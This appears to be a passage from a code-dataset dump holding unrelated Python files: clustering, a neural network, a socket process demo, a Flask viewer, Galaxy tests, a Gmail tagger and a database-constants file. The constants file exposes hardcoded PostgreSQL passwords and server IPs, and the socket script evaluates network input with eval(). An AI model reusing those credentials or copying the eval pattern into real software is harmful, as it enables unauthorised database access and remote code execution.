points, each with the same number of dimensions.\n (points can have more dimensions than 2)\n \n Returns a new point which is the center of all the points.\n \"\"\"\n summation: list = [sum(x) for x in zip(*points)]\n return [colSum /len(points) for colSum in summation]\n\n\ndef update_centers(dataset, assignments):\n \"\"\"\n Accepts a dataset and a list of assignments; the indexes \n of both lists correspond to each other.\n Compute the center for each of the assigned groups.\n Return `k` centers in a list\n \"\"\"\n temp = defaultdict(list)\n centers = []\n for assignment, point in zip(assignments, dataset):\n temp[assignment].append(point)\n\n for i in temp.values():\n centers.append(point_avg(i))\n\n return centers\n\ndef assign_points(data_points, centers):\n \"\"\"\n \"\"\"\n assignments = []\n for point in data_points:\n shortest = inf # positive infinity\n shortest_index = 0\n for i in range(len(centers)):\n val = distance(point, centers[i])\n if val < shortest:\n shortest = val\n shortest_index = i\n assignments.append(shortest_index)\n return assignments\n\n\ndef distance(a, b):\n \"\"\"\n Returns the Euclidean distance between a and b\n \"\"\"\n if (hasattr(a[0], '__len__')):\n rows = len(a); cols = len(a[0])\n summation = 0\n\n for i in range(rows):\n vec = [a[i][j] - b[i][j] for j in range(cols)]\n\n s = sum(i**2 for i in vec)\n summation += s\n\n\n else:\n summation = sum([(a[i] - b[i])**2 for i in range(len(a))])\n\n return summation**(1/2)\n\ndef distance_squared(a, b):\n return distance(a, b)**2\n\ndef generate_k(dataset, k):\n \"\"\"\n Given `data_set`, which is an array of arrays,\n return a random set of k points from the data_set\n \"\"\"\n points = [dataset[random.randint(0, len(dataset) - 1)] for i in range(0, k)]\n return points\n\ndef cost_function(clustering):\n total_cost = 0\n for data_set in clustering.keys():\n datas = clustering[data_set]\n centers = point_avg(datas)\n for indiv_data in datas:\n total_cost += distance(indiv_data, centers)\n return total_cost\n\ndef generate_k_pp(dataset, k):\n \"\"\"\n Given `data_set`, which is an array of arrays,\n return a random set of k points from the data_set\n where points are picked with a probability proportional\n to their distance as per kmeans pp\n \"\"\"\n random_centers: list = generate_k(dataset, k)\n random_assignments: list = assign_points(dataset, random_centers)\n\n distances: list = [distance(random_centers[random_assignments[i]], dataset[i]) for i in range(len(dataset))]\n \n # Generate indices for each distance then sort in ascending order of distance\n indices: list = [i for i in range(len(distances))]\n indices = [j for i, j in sorted(zip(distances, indices))]\n\n weighted_indices: list = []\n for i in range(len(indices)):\n n: int = int(distances[indices[i]])\n \n for j in range(n):\n weighted_indices.append(indices[i])\n\n N: int = len(weighted_indices) - 1\n\n pp_centers: list = []\n random_numbers: list = []\n choices: list = []\n for i in range(k):\n random_choice: int = random.randint(0, N)\n index = weighted_indices[random_choice]\n\n if random_choice in random_numbers or index in choices:\n while random_choice in choices or index in choices:\n random_choice = random.randint(0, N)\n index = weighted_indices[random_choice]\n\n random_numbers.append(random_choice)\n choices.append(index)\n pp_centers.append(dataset[index])\n \n return pp_centers\n\n\ndef _do_lloyds_algo(dataset, k_points):\n assignments = assign_points(dataset, k_points)\n old_assignments = None\n while assignments != old_assignments:\n new_centers = update_centers(dataset, assignments)\n old_assignments = assignments\n assignments = assign_points(dataset, new_centers)\n clustering = defaultdict(list)\n for assignment, point in zip(assignments, dataset):\n clustering[assignment].append(point)\n return clustering\n\n\ndef k_means(dataset, k):\n if k not in range(1, len(dataset)+1):\n raise ValueError(\"lengths must be in [1, len(dataset)]\")\n \n k_points = generate_k(dataset, k)\n return _do_lloyds_algo(dataset, k_points)\n\n\ndef k_means_pp(dataset, k):\n if k not in range(1, len(dataset)+1):\n raise ValueError(\"lengths must be in [1, len(dataset)]\")\n\n k_points = generate_k_pp(dataset, k)\n return _do_lloyds_algo(dataset, k_points)\n\nif __name__ =='__main__':\n from cs506 import read\n\n data = read.read_csv('D:/OneDrive/College Notebook/Boston University/Fall Senior Year/CS 506/CS506-Fall2020/02-library/tests/test_files/dataset_1.csv')\n res = (k_means(data, 4))\n print(res[0])","sub_path":"02-library/cs506/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":5046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"36016999","text":"import sys, os\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom chap3_minist import load_mnist\nfrom PIL import Image\nfrom collections import OrderedDict\n\nclass MulLayer:\n def __init__(self):\n self.x = None\n self.y = None\n\n def forward(self, x, y):\n self.x = x\n self.y = y\n out = x * y\n return out\n\n def backward(self, dout):\n dx = dout * self.y\n dy = dout * self.x\n return dx, dy\n\n\nclass AddLayer:\n def __init__(self):\n pass\n\n def forward(self, x, y):\n out = x + y\n return out\n\n def backward(self, dout):\n dx = dout * 1\n dy = dout * 1\n return dx, dy\n\n\nclass ReLu:\n def __init__(self):\n self.mask = None\n\n def forward(self, x):\n self.mask = (x <= 0)\n out = x.copy()\n out[self.mask] = 0\n return out\n \n def backward(self, dout):\n dout[self.mask] = 0\n dx = dout\n return dx\n\nclass Sigmoid:\n def __init__(self):\n self.out = None\n\n def forward(self, x):\n out = 1 / (1 + np.exp(-x))\n self.out = out\n\n def backward(self, dout):\n dx = dout * (1.0 - self.out) * self.out\n return dx\n\nclass Affine:\n def __init__(self, W, b):\n self.W = W\n self.b = b\n self.x = None\n self.dW = None\n self.db = None\n\n def forward(self, x):\n self.x = x\n out = np.dot(x, self.W) + self.b\n return out\n\n def backward(self, dout):\n dx = np.dot(dout, self.W.T)\n self.dW = np.dot(self.x.T, dout)\n self.db = np.sum(dout, axis = 0)\n return dx\n\ndef softmax(x):\n if x.ndim == 2:\n x = x.T\n x = x - np.max(x, axis=0)\n y = np.exp(x) / np.sum(np.exp(x), axis=0)\n return y.T \n\n x = x - np.max(x) # オーバーフロー対策\n return np.exp(x) / np.sum(np.exp(x))\n\ndef cross_entropy_error(y, t):\n # delta = 1e-7\n # return -np.psum(t * np.log(y + delta))\n if y.ndim == 1:\n t = t.reshape(1, t.size)\n y = y.reshape(1, y.size)\n\n batch_size = y.shape[0]\n return -np.sum(t * np.log(y + 1e-7)) / batch_size\n\nclass SoftmaxWithLoss:\n def __init__(self):\n self.loss = None\n self.y = None\n self.t = None\n\n def forward(self, x, t):\n self.t = t\n self.y = softmax(x)\n self.loss = cross_entropy_error(self.y, self.t)\n return self.loss\n\n def backward(self, dout = 1):\n batch_size = self.t.shape[0]\n dx = (self.y - self.t) / batch_size\n return dx\n\ndef numerical_gradient(f, x):\n h = 1e-4 # 0.0001\n grad = np.zeros_like(x)\n \n it = np.nditer(x, flags=['multi_index'], op_flags=['readwrite'])\n while not it.finished:\n idx = it.multi_index\n tmp_val = x[idx]\n x[idx] = tmp_val + h\n fxh1 = f(x) # f(x+h)\n \n x[idx] = tmp_val - h \n fxh2 = f(x) # f(x-h)\n grad[idx] = (fxh1 - fxh2) / (2*h)\n \n x[idx] = tmp_val # 値を元に戻す\n it.iternext() \n \n return grad\n\nclass TwoLayerNet:\n\n def __init__(self, input_size, hidden_size, output_size,\n weight_init_std = 0.01):\n self.params = {}\n self.params['W1'] = weight_init_std * \\\n np.random.randn(input_size, hidden_size)\n self.params['b1'] = np.zeros(hidden_size)\n self.params['W2'] = weight_init_std * \\\n np.random.randn(hidden_size, output_size)\n self.params['b2'] = np.zeros(output_size)\n\n self.layers = OrderedDict()\n self.layers['Affine1'] = Affine(self.params['W1'], self.params['b1'])\n self.layers['ReLu1'] = ReLu()\n self.layers['Affine2'] = Affine(self.params['W2'], self.params['b2'])\n\n self.lastLayer = SoftmaxWithLoss()\n\n def predict(self, x):\n for layer in self.layers.values():\n x = layer.forward(x)\n return x\n\n def loss(self, x, t):\n y = self.predict(x)\n return self.lastLayer.forward(y, t)\n\n def accuracy(self, x, t):\n y = self.predict(x)\n y = np.argmax(y, axis = 1)\n if t.ndim != 1:\n t = np.argmax(t, axis = 1)\n\n accuracy = np.sum(y == t) / float(x.shape[0])\n return accuracy\n\n def numerical_gradient(self, x, t):\n loss_W = lambda W: self.loss(x, t)\n\n grads = {}\n grads['W1'] = numerical_gradient(loss_W, self.params['W1'])\n grads['b1'] = numerical_gradient(loss_W, self.params['b1'])\n grads['W2'] = numerical_gradient(loss_W, self.params['W2'])\n grads['b2'] = numerical_gradient(loss_W, self.params['b2'])\n return grads\n\n def gradient(self, x, t):\n self.loss(x, t)\n\n dout = 1\n dout = self.lastLayer.backward(dout)\n\n layers = list(self.layers.values())\n layers.reverse()\n for layer in layers:\n dout = layer.backward(dout)\n\n grads = {}\n grads['W1'] = self.layers['Affine1'].dW\n grads['b1'] = self.layers['Affine1'].db\n grads['W2'] = self.layers['Affine2'].dW\n grads['b2'] = self.layers['Affine2'].db\n return grads\n\n\nif __name__ == '__main__':\n (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label = True)\n network = TwoLayerNet(input_size = 784, hidden_size = 50,\n output_size = 10)\n\n iters_num = 10000\n train_size = x_train.shape[0]\n batch_size = 100\n learning_rate = 0.1\n\n train_loss_list = []\n train_acc_list = []\n test_acc_list = []\n\n iter_per_epoch = max(train_size / batch_size, 1)\n\n for i in range(iters_num):\n batch_mask = np.random.choice(train_size, batch_size)\n x_batch = x_train[batch_mask]\n t_batch = t_train[batch_mask]\n\n grad = network.gradient(x_batch, t_batch)\n\n for key in ('W1', 'b1', 'W2', 'b2'):\n network.params[key] -= learning_rate * grad[key]\n\n loss = network.loss(x_batch, t_batch)\n train_loss_list.append(loss)\n\n if i % iter_per_epoch == 0:\n train_acc = network.accuracy(x_train, t_train)\n test_acc = network.accuracy(x_test, t_test)\n train_acc_list.append(train_acc)\n test_acc_list.append(test_acc)\n print(train_acc, test_acc)\n","sub_path":"chap5.py","file_name":"chap5.py","file_ext":"py","file_size_in_byte":6319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"387389125","text":"import socket\r\nimport math\r\nimport threading\r\nimport time\r\n\r\nclass process1:\r\n\r\n def process1_socket(self, port):\r\n host = '127.0.0.1'\r\n port = 5001\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.bind((host, port))\r\n return s\r\n\r\n def process1_events(self, process_port):\r\n self.events_sent = [1.1, 1.2, 1.3]\r\n self.flag = False\r\n self.process_port = int(process_port)\r\n self.sock = self.process1_socket(self.process_port)\r\n self.events_ = []\r\n self.ack = []\r\n\r\n def process1_send(self):\r\n while self.flag is False:\r\n message1 = {'message': 1.1}\r\n message2 = {'message': 1.2}\r\n message3 = {'message': 1.3}\r\n self.sock.sendto(str(message1).encode('utf-8'), ('host', 5002))\r\n self.sock.sendto(str(message2).encode('utf-8'), ('host', 5002))\r\n self.sock.sendto(str(message3).encode('utf-8'), ('host', 5002))\r\n self.sock.sendto(str(message1).encode('utf-8'), ('host', 5003))\r\n self.sock.sendto(str(message2).encode('utf-8'), ('host', 5003))\r\n self.sock.sendto(str(message3).encode('utf-8'), ('host', 5003))\r\n\r\n def process1_listen(self):\r\n while true:\r\n try:\r\n if self.sock is not None:\r\n data, server_address = self.sock.recvfrom(1024)\r\n decode_data = eval(data.decode('utf-8'))\r\n if 'message' in decode_data:\r\n self.events_sofar.append(decode_data['message'])\r\n elif 'ack' in decode_data:\r\n self.ack_recv.append(decode_data['ack'])\r\n except KeyboardInterrupt:\r\n self.sock.close()\r\n\r\n def process1_ack(self):\r\n if len(self.events_sofar) > 0:\r\n self.events_sofar = sorted(self.events_sofar)\r\n for each_event in range(len(self.events_sofar)):\r\n fractional, pid = math.modf(self.events_sofar[each_event])\r\n if pid == 2:\r\n self.sock.sendto(str({'ack': self.events_sofar[each_event]}).encode('utf-8'), ('host', 5002))\r\n elif pid == 3:\r\n self.sock.sendto(str({'ack': self.events_sofar[each_event]}).encode('utf-8'), ('host', 5003))\r\n\r\n def process1_observe(self):\r\n while True:\r\n if len(self.ack_recv) > 0:\r\n set.flag = True\r\n break\r\n else:\r\n continue\r\n\r\n def print_events(self):\r\n for event in range(len(self.events_sent)):\r\n self.events_sofar.append(self.events_sent[event])\r\n b = list(set(self.events_sofar))\r\n b.sort(key=float)\r\n for each in range(len(b)):\r\n fractional, pid = math.modf(self.b[each])\r\n if pid == 1:\r\n print(\"{} is self event\".format(b[each]))\r\n else:\r\n print('successfully event {} received'.format(y[each]))\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == 'main':\r\n\r\n server = process1(5001)\r\n time.sleep(0.8)\r\n threading.Thread(target=server.process1_listen).start()\r\n threading.Thread(target=server.process1_send).start()\r\n threading.Thread(target=server.process1_ack).start()\r\n threading.Thread(target=server.process1_observe).start()\r\n time.sleep(4)\r\n server.print_events()\r\n print(\"process1-completed successfully\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"process1.py","file_name":"process1.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"557318070","text":"from typing import Optional\nimport logging\n\nimport boto3\nfrom botocore.exceptions import ClientError\n\nfrom kermes_infra.models import EBook\n\n\nclass EBookAdapter:\n def __init__(self, endpoint_url: str, table_name: str, logger: logging.Logger) -> None:\n self.dynamodb = boto3.resource(\"dynamodb\", endpoint_url=endpoint_url)\n self.table = self.dynamodb.Table(table_name)\n self.logger = logger\n\n def get(self, user_id: str, ebook_id: str) -> Optional[EBook]:\n try:\n item = self.table.get_item(Key={\"user_id\": user_id, \"ebook_id\": ebook_id})\n\n return EBook.from_dynamo(item[\"Item\"])\n except ClientError:\n self.logger.exception(f\"error while getting record from Dynamo: user_id {user_id}, ebook_id {ebook_id}\")\n return None\n\n def get_all(self, user_id: str):\n pass\n\n def put(self, ebook: EBook) -> bool:\n try:\n self.table.put_item(Item=ebook.to_dynamo())\n return True\n except ClientError:\n self.logger.exception(\n f\"error while writing record to Dynamo: user_id {ebook.user_id}, ebook_id {ebook.ebook_id}\",\n )\n return False\n","sub_path":"libs/kermes-infra/kermes_infra/repositories/aws_adapters/ebook_adapter.py","file_name":"ebook_adapter.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"510261646","text":"#app.py is the site's \"backend,\" and will route data to the appropriate pages.\n\nimport csv\nfrom flask import Flask\nfrom flask import abort\nfrom flask import render_template #flask function that combines data with HTML\napp = Flask(__name__)\n\ndef get_csv():\n\tcsv_path = './static/la-riots-deaths.csv'\n\tcsv_file = open(csv_path, 'rb')\n\tcsv_obj = csv.DictReader(csv_file)\n\tcsv_list = list(csv_obj) \n\treturn csv_list\n\n@app.route(\"/\") #decorater connects def function with the site's root URL\ndef index(): #index function returns rendered index.html template\n\ttemplate = 'index.html'\n\tobject_list = get_csv()\n\treturn render_template(template, object_list=object_list) #pass CSV data on the top the template (where it will be named object_list)\n\n@app.route('//')\ndef detail(row_id):\n\ttemplate = 'detail.html'\n\tobject_list = get_csv()\n\tfor row in object_list:\n\t\tif row['id'] == row_id:\n\t\t\treturn render_template(template, object=row)\n\tabort(404)\n\t\nif __name__ == '__main__':\n\tapp.run(debug=True, use_reloader=True) #start the flask server when app.py is run from the command line","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"548856110","text":"\"\"\"Integration tests for running tools in Docker containers.\"\"\"\n\nimport os\nimport unittest\n\nfrom base import integration_util\nfrom base.populators import (\n DatasetPopulator,\n)\n\nfrom galaxy.tool_util.deps.commands import which\nfrom .test_job_environments import RunsEnvironmentJobs\n\nSCRIPT_DIRECTORY = os.path.abspath(os.path.dirname(__file__))\nDOCKERIZED_JOB_CONFIG_FILE = os.path.join(SCRIPT_DIRECTORY, \"dockerized_job_conf.xml\")\nSINGULARITY_JOB_CONFIG_FILE = os.path.join(SCRIPT_DIRECTORY, \"singularity_job_conf.xml\")\nEXTENDED_TIMEOUT = 120\n\n\nclass MulledJobTestCases(object):\n def test_explicit(self):\n self.dataset_populator.run_tool(\"mulled_example_explicit\", {}, self.history_id)\n self.dataset_populator.wait_for_history(self.history_id, assert_ok=True)\n output = self.dataset_populator.get_history_dataset_content(self.history_id, timeout=EXTENDED_TIMEOUT)\n assert \"0.7.15-r1140\" in output\n\n def test_mulled_simple(self):\n self.dataset_populator.run_tool(\"mulled_example_simple\", {}, self.history_id)\n self.dataset_populator.wait_for_history(self.history_id, assert_ok=True)\n output = self.dataset_populator.get_history_dataset_content(self.history_id, timeout=EXTENDED_TIMEOUT)\n assert \"0.7.15-r1140\" in output\n\n\nclass DockerizedJobsIntegrationTestCase(integration_util.IntegrationTestCase, RunsEnvironmentJobs, MulledJobTestCases):\n\n framework_tool_and_types = True\n job_config_file = DOCKERIZED_JOB_CONFIG_FILE\n build_mulled_resolver = 'build_mulled'\n container_type = 'docker'\n default_container_home_dir = '/'\n\n @classmethod\n def handle_galaxy_config_kwds(cls, config):\n cls.jobs_directory = cls._test_driver.mkdtemp()\n config[\"jobs_directory\"] = cls.jobs_directory\n config[\"job_config_file\"] = cls.job_config_file\n # Disable tool dependency resolution.\n config[\"tool_dependency_dir\"] = \"none\"\n config[\"conda_auto_init\"] = False\n config[\"conda_auto_install\"] = False\n config[\"enable_beta_mulled_containers\"] = \"true\"\n\n @classmethod\n def setUpClass(cls):\n if not which(cls.container_type):\n raise unittest.SkipTest(\"Executable '%s' not found on PATH\" % cls.container_type)\n super(DockerizedJobsIntegrationTestCase, cls).setUpClass()\n\n def setUp(self):\n super(DockerizedJobsIntegrationTestCase, self).setUp()\n self.dataset_populator = DatasetPopulator(self.galaxy_interactor)\n self.history_id = self.dataset_populator.new_history()\n\n def test_container_job_environment(self):\n job_env = self._run_and_get_environment_properties(\"job_environment_default\")\n\n euid = os.geteuid()\n egid = os.getgid()\n\n assert job_env.user_id == str(euid), job_env.user_id\n assert job_env.group_id == str(egid), job_env.group_id\n assert job_env.pwd.startswith(self.jobs_directory)\n assert job_env.pwd.endswith(\"/working\")\n assert job_env.home.startswith(self.jobs_directory)\n assert job_env.home.endswith(\"/home\")\n\n def test_container_job_environment_legacy(self):\n job_env = self._run_and_get_environment_properties(\"job_environment_default_legacy\")\n\n euid = os.geteuid()\n egid = os.getgid()\n\n assert job_env.user_id == str(euid), job_env.user_id\n assert job_env.group_id == str(egid), job_env.group_id\n assert job_env.pwd.startswith(self.jobs_directory)\n assert job_env.pwd.endswith(\"/working\")\n # Should we change env_pass_through to just always include TMP and HOME for docker?\n # I'm not sure, if yes this would change.\n assert job_env.home == self.default_container_home_dir, job_env.home\n\n def test_build_mulled(self):\n if not which('docker'):\n raise unittest.SkipTest(\"Docker not found on PATH, required for building images via involucro\")\n resolver_type = self.build_mulled_resolver\n tool_id = 'mulled_example_multi_1'\n endpoint = \"tools/%s/dependencies\" % tool_id\n data = {'id': tool_id, 'resolver_type': resolver_type}\n create_response = self._post(endpoint, data=data, admin=True)\n self._assert_status_code_is(create_response, 200)\n response = create_response.json()\n assert any([True for d in response if d['dependency_type'] == self.container_type])\n\n\nclass SingularityJobsIntegrationTestCase(DockerizedJobsIntegrationTestCase):\n\n job_config_file = SINGULARITY_JOB_CONFIG_FILE\n build_mulled_resolver = 'build_mulled_singularity'\n container_type = 'singularity'\n # singularity passes $HOME by default\n default_container_home_dir = os.environ.get('HOME', '/')\n","sub_path":"test/integration/test_containerized_jobs.py","file_name":"test_containerized_jobs.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"530198575","text":"\"\"\" An automatic mail sorter using Gmail's API \"\"\"\n\nimport os\nimport sys\nimport pickle\nfrom apiclient import errors\nfrom googleapiclient.discovery import build\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\nfrom config import Config\n\nclass Tagger:\n \"\"\" Main class responsible for using Gmail's api directly \"\"\"\n\n def __init__(self):\n self.scopes = 'https://www.googleapis.com/auth/gmail.modify'\n self.config = Config()\n self.service = build('gmail', 'v1', credentials=self.get_credentials())\n\n\n def get_credentials(self):\n \"\"\" Gets valid user credentials from storage. If nothing has been stored, or\n if the stored credentials are invalid, new credentials are created. \"\"\"\n creds = None\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no valid credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file('credentials.json', self.scopes)\n creds = flow.run_local_server()\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n return creds\n\n def get_filtered_ids(self, query, label, time=\"2\"):\n \"\"\" List all Messages of the user's mailbox matching the query.\n user_id: User's email address.\n query: String to filter the messages by.\n time: Time range to filter messages from, by default is 48 hours. \"\"\"\n query = \"newer_than:{0}d (from: {1} OR to: {1})\".format(time, query)\n print(query)\n response = self.service.users().messages().list(userId='me', q=query).execute()\n ids = []\n if 'messages' in response:\n response = response['messages']\n ids.extend([msg['id'] for msg in response if not self.is_labeled(msg['id'], label)])\n while 'nextPageToken' in response:\n response = self.service.users().messages().list(\n userId='me', q=query, pageToken=response['nextPageToken']).execute()['messages']\n ids.extend([msg['id'] for msg in response if not self.is_labeled(msg['id'], label)])\n return ids\n\n def is_labeled(self, msg_id, label):\n \"\"\" Check if the message is already labeled \"\"\"\n message = self.service.users().messages().get(userId='me', id=msg_id).execute()\n return label in message['labelIds']\n\n def init_queries(self, time=\"2\"):\n \"\"\" Main feauture of the program - tag emails according to the settings file.\"\"\"\n results = self.service.users().labels().list(userId='me').execute()\n labels = dict([l['name'], l['id']] for l in results.get('labels', []))\n settings = self.config.get_settings()\n\n for tag, queries in settings.items():\n msg_ids = []\n print(\"\\n\\n[+] Current tag query: \" + tag)\n for current in queries:\n print(\"[+] Searching for email query {0} ...\".format(current))\n msg_ids += self.get_filtered_ids(current, labels[tag], time)\n print(\"[!] Located a total of {0} messages: tagging as {1}\".format(len(msg_ids), tag))\n self.tag(msg_ids, {'removeLabelIds': [], 'addLabelIds': [labels[tag]]})\n\n def tag(self, msg_ids, new_tags):\n \"\"\" Tagging messages with new tags \"\"\"\n for index, msg in enumerate(msg_ids):\n try:\n self.service.users().messages().modify(userId='me', id=msg, body=new_tags).execute()\n update_progress(len(msg_ids), index + 1)\n except errors.HttpError as error:\n print('An error occurred: ' + str(error))\n\ndef update_progress(total, completed):\n \"\"\" Generating a progress bar \"\"\"\n bar_len = 50\n progress = round((completed / total) * 100, 2)\n block = int(bar_len * progress / 100)\n # Creating a progress bar per each tagging query\n sys.stdout.write(\"\\rProgress: [{0}]\".format(\"#\" * block + \"-\" * (bar_len - block)))\n if progress == 100.0:\n sys.stdout.write(\" Completed.\")\n else:\n sys.stdout.write(\" {0}%\".format(progress))\n sys.stdout.flush()\n\ndef main():\n \"\"\" Main function.\"\"\"\n tag = Tagger()\n tag.init_queries()\n\nif __name__ == '__main__':\n main()\n","sub_path":"tagger.py","file_name":"tagger.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"178279305","text":"\"\"\"\nBalanced ACH client library.\n\"\"\"\nimport os\nimport re\n\ntry:\n import setuptools\nexcept ImportError:\n import distutils.core\n setup = distutils.core.setup\nelse:\n setup = setuptools.setup\n\nsetup(\n name='balanced-ach',\n version=(\n re\n .compile(r\".*__version__ = '(.*?)'\", re.S)\n .match(open('balanced_ach.py').read())\n .group(1)\n ),\n url='https://github.com/balanced/balanced-ach-python',\n license='BSD',\n author='Balanced',\n author_email='dev@balancedpayments.com',\n description='Balanced ACH client library',\n long_description=(\n open('README.rst').read()\n ),\n py_modules=['balanced_ach'],\n tests_require=[\n 'nose ==1.1.2',\n 'mock ==0.8',\n 'unittest2 >=0.5.1',\n ],\n install_requires=[\n 'iso8601 >=0.1.4',\n 'simplejson >=2.3.2',\n 'wac >=0.11',\n ],\n test_suite='nose.collector',\n classifiers=[\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n)\n","sub_path":"pypi_install_script/balanced-ach-0.1.5.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"274213638","text":"\"\"\"\nA ``Checked`` subclass definition requires that keyword arguments are\nused to create an instance, and provides a nice ``__repr__``::\n\n# tag::MOVIE_DEFINITION[]\n\n >>> @checked\n ... class Movie:\n ... title: str\n ... year: int\n ... megabucks: float\n ...\n >>> movie = Movie(title='The Godfather', year=1972, megabucks=137) # <3>\n >>> movie.title\n 'The Godfather'\n >>> movie # <4>\n Movie(title='The Godfather', year=1972, megabucks=137.0)\n\n# end::MOVIE_DEFINITION[]\n\nThe type of arguments is runtime checked when an attribute is set,\nincluding during instantiation::\n\n# tag::MOVIE_TYPE_VALIDATION[]\n\n >>> movie.year = 'MCMLXXII' # <1>\n Traceback (most recent call last):\n ...\n TypeError: 'MCMLXXII' is not compatible with year:int\n >>> blockbuster = Movie(title='Avatar', year=2009, megabucks='billions') # <2>\n Traceback (most recent call last):\n ...\n TypeError: 'billions' is not compatible with megabucks:float\n\n# end::MOVIE_TYPE_VALIDATION[]\n\nAttributes not passed as arguments to the constructor are initialized with\ndefault values::\n\n# tag::MOVIE_DEFAULTS[]\n\n >>> Movie(title='Life of Brian')\n Movie(title='Life of Brian', year=0, megabucks=0.0)\n\n# end::MOVIE_DEFAULTS[]\n\nProviding extra arguments to the constructor is not allowed::\n\n >>> blockbuster = Movie(title='Avatar', year=2009, megabucks=2000,\n ... director='James Cameron')\n Traceback (most recent call last):\n ...\n AttributeError: 'Movie' has no attribute 'director'\n\nCreating new attributes at runtime is restricted as well::\n\n >>> movie.director = 'Francis Ford Coppola'\n Traceback (most recent call last):\n ...\n AttributeError: 'Movie' has no attribute 'director'\n\nThe `_as_dict` instance creates a `dict` from the attributes of a `Movie` object::\n\n >>> movie._asdict()\n {'title': 'The Godfather', 'year': 1972, 'megabucks': 137.0}\n\n\"\"\"\n\nfrom collections.abc import Callable # <1>\nfrom typing import Any, NoReturn, get_type_hints\n\nMISSING = object() # <2>\n\n\nclass Field:\n def __init__(self, name: str, constructor: Callable) -> None: # <3>\n self.name = name\n self.constructor = constructor\n\n def __set__(self, instance: Any, value: Any) -> None: # <4>\n if value is MISSING: # <5>\n value = self.constructor()\n else:\n try:\n value = self.constructor(value) # <6>\n except (TypeError, ValueError) as e:\n type_name = self.constructor.__name__\n msg = (\n f'{value!r} is not compatible with {self.name}:{type_name}'\n )\n raise TypeError(msg) from e\n instance.__dict__[self.name] = value # <7>\n\n\n# tag::CHECKED_DECORATOR_TOP[]\n_methods_to_inject: list[Callable] = []\n_classmethods_to_inject: list[Callable] = []\n\ndef checked(cls: type) -> type: # <2>\n for func in _methods_to_inject:\n name = func.__name__\n setattr(cls, name, func) # <5>\n\n for func in _classmethods_to_inject:\n name = func.__name__\n setattr(cls, name, classmethod(func)) # <5>\n\n for name, constructor in _fields(cls).items(): # <4>\n setattr(cls, name, Field(name, constructor)) # <5>\n\n return cls\n\n\ndef _method(func: Callable) -> Callable:\n _methods_to_inject.append(func)\n return func\n\n\ndef _classmethod(func: Callable) -> Callable:\n _classmethods_to_inject.append(func)\n return func\n\n# tag::CHECKED_METHODS_TOP[]\n@_classmethod\ndef _fields(cls: type) -> dict[str, type]: # <1>\n return get_type_hints(cls)\n\n@_method\ndef __init__(self: Any, **kwargs: Any) -> None:\n for name in self._fields(): # <6>\n value = kwargs.pop(name, MISSING) # <7>\n setattr(self, name, value) # <8>\n if kwargs: # <9>\n self.__flag_unknown_attrs(*kwargs) # <10>\n\n@_method\ndef __setattr__(self: Any, name: str, value: Any) -> None: # <11>\n if name in self._fields(): # <12>\n cls = self.__class__\n descriptor = getattr(cls, name)\n descriptor.__set__(self, value) # <13>\n else: # <14>\n self.__flag_unknown_attrs(name)\n# end::CHECKED_METHODS_TOP[]\n\n# tag::CHECKED_METHODS_BOTTOM[]\n@_method\ndef __flag_unknown_attrs(self: Any, *names: str) -> NoReturn: # <1>\n plural = 's' if len(names) > 1 else ''\n extra = ', '.join(f'{name!r}' for name in names)\n cls_name = repr(self.__class__.__name__)\n raise AttributeError(f'{cls_name} has no attribute{plural} {extra}')\n\n\n@_method\ndef _asdict(self: Any) -> dict[str, Any]: # <2>\n return {\n name: getattr(self, name)\n for name, attr in self.__class__.__dict__.items()\n if isinstance(attr, Field)\n }\n\n\n@_method\ndef __repr__(self: Any) -> str: # <3>\n kwargs = ', '.join(\n f'{key}={value!r}' for key, value in self._asdict().items()\n )\n return f'{self.__class__.__name__}({kwargs})'\n# end::CHECKED_METHODS_BOTTOM[]\n","sub_path":"25-class-metaprog/checkeddeco/checkeddeco.py","file_name":"checkeddeco.py","file_ext":"py","file_size_in_byte":5053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"170928074","text":"import socket, asyncio\nfrom sqlalchemy import create_engine\n\nclass DBConstants:\n Successful_update = 'UPDATE 1'\n Successful_delete = 'DELETE 1'\n DB_products = ['postgresql://postgres:ds5673@35.193.117.225:5432/product_database',\n 'postgresql://postgres:ds5673@34.69.156.181:5432/product_database',\n 'postgresql://postgres:ds5673@34.69.171.76:5432/product_database']\n DB_customers = ['postgresql://postgres:ds5673@35.232.192.83:5432/customer_database',\n 'postgresql://postgres:ds5673@34.123.110.112:5432/customer_database',\n 'postgresql://postgres:ds5673@35.188.148.198:5432/customer_database']\n\n\nclass Financial_transactions:\n 